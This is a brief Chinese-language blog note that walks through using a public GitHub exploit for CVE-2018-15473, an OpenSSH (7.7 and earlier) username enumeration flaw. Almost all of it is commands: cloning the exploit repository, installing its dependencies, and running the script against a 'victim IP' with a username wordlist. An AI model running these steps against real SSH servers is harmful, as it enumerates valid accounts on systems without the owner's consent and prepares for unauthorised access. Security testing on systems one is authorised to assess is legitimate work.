【笔记】CVE-2018-15473漏洞利用

发表于 更新于 阅读次数:

前言

利用Rhynorater/CVE-2018-15473-Exploit实现OpenSSH的用户名枚举漏洞

漏洞利用前提

  • OpenSSH <= 7.7

下载项目

1
2
git clone https://github.com/Rhynorater/CVE-2018-15473-Exploit.git
cd CVE-2018-15473-Exploit

下载依赖

1
2
3
python3 -m venv venv
source venv/bin/activate
pip3 install -r requirements.txt

exp

<ip>:受害者IP地址
--userList exampleInput.txt:指定字典

1
python3 sshUsernameEnumExploit.py --port 22 --userList exampleInput.txt <ip>

完成

参考文献

哔哩哔哩——xiaodisec